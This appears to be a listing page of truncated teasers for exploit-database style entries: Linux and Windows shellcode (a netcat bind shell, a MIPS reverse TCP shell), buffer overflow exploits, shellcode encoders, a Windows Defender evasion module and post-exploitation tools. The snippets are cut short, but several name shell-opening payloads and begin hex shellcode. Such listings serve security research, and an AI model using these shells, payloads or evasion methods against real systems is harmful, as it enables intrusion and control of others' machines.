Linux/x86 - Bind (99999/TCP) NetCat Traditional (/bin/nc) Shell (/bin/bash) Shellcode 58 bytes

/ Exploit Title: Linux/x86 - execve /bin/nc -lp99999 -e /bin/bash shellcode 58 bytes Exploit Description: Binds a TCP bash shell at port 99999 using netcat. Note: This shellcode uses netcat-traditional package. Otherwise, it will not work. Date: 04/11/2018 Exploit Author: Javier Tello Version: 1....

Windows/x86 - Messagebox Shellcode 358 bytes

// Exploit Title : win32 Messagebox shellcode 358 bytes // Exploit Author : Febriyanto Nugroho email protected // Tested on : Windows 7 x86 Ultimate include include char shellcode= "\x31\xdb\xb3\x30\x29\xdc\x64\x8b\x03\x8b\x40\x0c\x8b" "\x58\x1c\x8b\x1b\x8b\x1b\x8b\x73\x08\x89\xf7\x89\x3c"...

The use of a posture clear odd 11882 format overflow document analysis-vulnerability warning-the black bar safety net

Prior to inadvertently give a very interesting rtf document, the sandbox where the behavior of a pile, the document itself and confuse the very clear odd, so spend a little time to analyze this sample. Substantially clear the sample of the attack techniques and attack the chain, the open part of...

Morris Worm fingerd Stack Buffer Overflow Exploit

This Metasploit module exploits a stack buffer overflow in fingerd on 4.3BSD. This vulnerability was exploited by the Morris worm in 1988-11-02. Cliff Stoll reports on the worm in the epilogue of The Cuckoo's Egg. This module requires Metasploit: https://metasploit.com/download Current source:...

PCManFTPD 2.0.7 Server APPE Command Buffer Overflow

!/usr/bin/python Exploit Title: PCManFTPD 2.0.7 Server APPE Command - Buffer Overflow Exploit Date: 30/10/2018 Exploit Author: DC - Telspace Systems Vendor Homepage: http://pcman.openfoundry.org/ Contact: [email protected] Version: 2.0.7 Tested on: Windows XP Prof SP3 ENG x86 CVE:...

BlobRunner - Quickly Debug Shellcode Extracted During Malware Analysis

BlobRunner is a simple tool to quickly debug shellcode extracted during malware analysis. BlobRunner allocates memory for the target file and jumps to the base or offset of the allocated memory. This allows an analyst to quickly debug into extracted artifacts with minimal overhead and effort. To...

Linux/x86 - execve(/bin/cat /etc/ssh/sshd_config) Shellcode 44 Bytes

/ Linux/x86 - execve/bin/cat /etc/ssh/sshdconfig Shellcode 44 Bytes Author: Goutham Madhwaraj Tested on: i686 GNU/Linux Shellcode Length: 44 ShoutOut - BarrierSec gcc -fno-stack-protector -z execstack loader-bind.c -o Disassembly of section .text: 08048080 : 8048080: 31 c0 xor eax,eax 8048082: 50...

Adult Filter 1.0 - Buffer Overflow (SEH) Exploit

Exploit for windows platform in category local exploits Exploit Title: Adult Filter 1.0 - Buffer Overflow SEH Exploit Author: Özkan Mustafa Akkuş AkkuS Homepage: http://www.armcode.com/adult-filter/ Software Link: http://www.armcode.com/downloads/adult-filter.exe Version: 1.0 Tested on: Windows X...

Adult Filter 1.0 - Buffer Overflow (SEH)

Exploit Title: Adult Filter 1.0 - Buffer Overflow SEH Exploit Author: Özkan Mustafa Akkuş AkkuS Discovery Date: 2018-10-25 Homepage: http://www.armcode.com/adult-filter/ Software Link: http://www.armcode.com/downloads/adult-filter.exe Version: 1.0 Tested on: Windows XP Professional SP3 ENG Steps ...

Shellcode-Encrypter-Decrypter - Shellcode Encrypter & Decrypter By Using XOR Cipher To Encrypt And Decrypt Shellcode

A Shellcode Encrypter & Decrypter, Using XOR Cipher to enc and dec shellcode. Installation git clone https://github.com/blacknbunny/Shellcode-Encrypter-Decrypter.git && python enc.py --help Usage Example Encryption: python encdecshellcode.py --shellcode \x41\x41\x42\x42 --key SECRETKEY --option...

Linux/x86 print "If psycho say this is the end?" Shellcode (75 bytes)

/ Exploit Title : Linux/x86 print 'If psycho say "this is the end" ? :' Shellcode 75 bytes Exploit Author : Febriyanto Nugroho Tested on : Ubuntu 16.04 LTS Special thx : Meisye Deedee Cornelia :P / include include char shellcode= "\x31\xdb\x8d\x43\x0b\x99\x52\x6a\x6f\x68"...

IBM Security AppScan Standard 9.0.3 .udt Denial Of Service Exploit

Exploit for windows platform in category dos / poc Exploit Title: IBM Security AppScan Standard 9.0.3 .udt Denial Of Service Author: Kağan Çapar Software Link: http://www-01.ibm.com/support/docview.wss?uid=ibm10715965 Vendor Homepage : https://www.ibm.com/security/application-security/appscan...

RemoteRecon - Remote Recon And Collection

RemoteRecon provides the ability to execute post-exploitation capabilities against a remote host, without having to expose your complete toolkit/agent. Often times as operator's we need to compromise a host, just so we can keylog or screenshot or some other miniscule task against a person/host of...

Linux/x86 - execve(/bin/sh) + MMX/ROT13/XOR Shellcode (Encoder/Decoder) (104 bytes)

Linux/x86 - execve/bin/sh + MMX/ROT13/XOR Shellcode Encoder/Decoder 104 bytes. Shellcode exploit for Linuxx86 platform Title: Linux/x86 - execve/bin/sh + MMX/ROT13/XOR Shellcode Encoder/Decoder 104 bytes Author: Kartik Durg Date: 201-10-04 Shellcode Length: 104 BYTES Student-ID: SLAE-1233 Write-u...

Linux/MIPS (Big Endian) - execve(/bin/sh) + Reverse TCP 192.168.2.157/31337 Shellcode (181 bytes)

Linux/MIPS Big Endian - execve/bin/sh + Reverse TCP 192.168.2.157/31337 Shellcode 181 bytes. Shellcode exploit for LinuxMIPS platform / Linux/MIPS Big Endian - execve/bin/sh + Reverse TCP 192.168.2.157/31337 Shellcode 181 bytes Author: cq674350529 Date: 2018-10-07 - execve'/bin/sh', tcp -...

Linux/x86 - execve(/bin/sh) + MMX/ROT13/XOR Shellcode (Encoder/Decoder) (104 bytes)

Title: Linux/x86 - execve/bin/sh + MMX/ROT13/XOR Shellcode Encoder/Decoder 104 bytes Author: Kartik Durg Shellcode Length: 104 BYTES Student-ID: SLAE-1233 Write-up Link: https://iamroot.blog/2018/10/02/0x4-rot13xorencodermmxdecodershellcode-linux-x86/ Tested on: Ubuntu 16.0.4.1 i686...

Linux/MIPS (Big Endian) - execve(/bin/sh) + Reverse TCP 192.168.2.157/31337 Shellcode (181 bytes)

/ Linux/MIPS Big Endian - execve/bin/sh + Reverse TCP 192.168.2.157/31337 Shellcode 181 bytes Author: cq674350529 - execve'/bin/sh', tcp - 192.168.2.157/31337 - used in HTTP Request - tested on D-Link dir-850l router, avoid bad chars '\x00', '\x20', '\x23', '\x0d\x0a' - based on rigan's shellcode...

Microsoft Windows Defender Evasive JS.Net and HTA

This module will generate an HTA file that writes and compiles a JScript.NET file containing shellcode on the target machine. After compilation, the generated EXE will execute the shellcode without interference from Windows Defender. It is recommended that you use a payload that uses RC4 or HTTPS...

Linux/x86 - execve(/bin/sh) + NOT +SHIFT-N+ XOR-N Encoded Shellcode (50 bytes)

/ Title: Linux\x86 NOT +SHIFT-N+ XOR-N + encoded /bin/sh Shellcode 50 byes Author: Pedro Cabral Purpose: spawn /bin/sh shell Tested On: Ubuntu 16.04.01 LTS Arch: x86 Size: 50 bytes sh.asm global start section .text start: xor eax, eax ; reseting the register push eax ; pushing null terminator pus...

Linux/x86 - execve(/bin/sh) + NOT/SHIFT-N/XOR-N Encoded Shellcode (50 byes)

Linux/x86 - execve/bin/sh + NOT/SHIFT-N/XOR-N Encoded Shellcode 50 byes. Shellcode exploit for Linuxx86 platform / Title: Linux\x86 NOT +SHIFT-N+ XOR-N + encoded /bin/sh Shellcode 50 byes Author: Pedro Cabral Purpose: spawn /bin/sh shell Tested On: Ubuntu 16.04.01 LTS Arch: x86 Size: 50 bytes...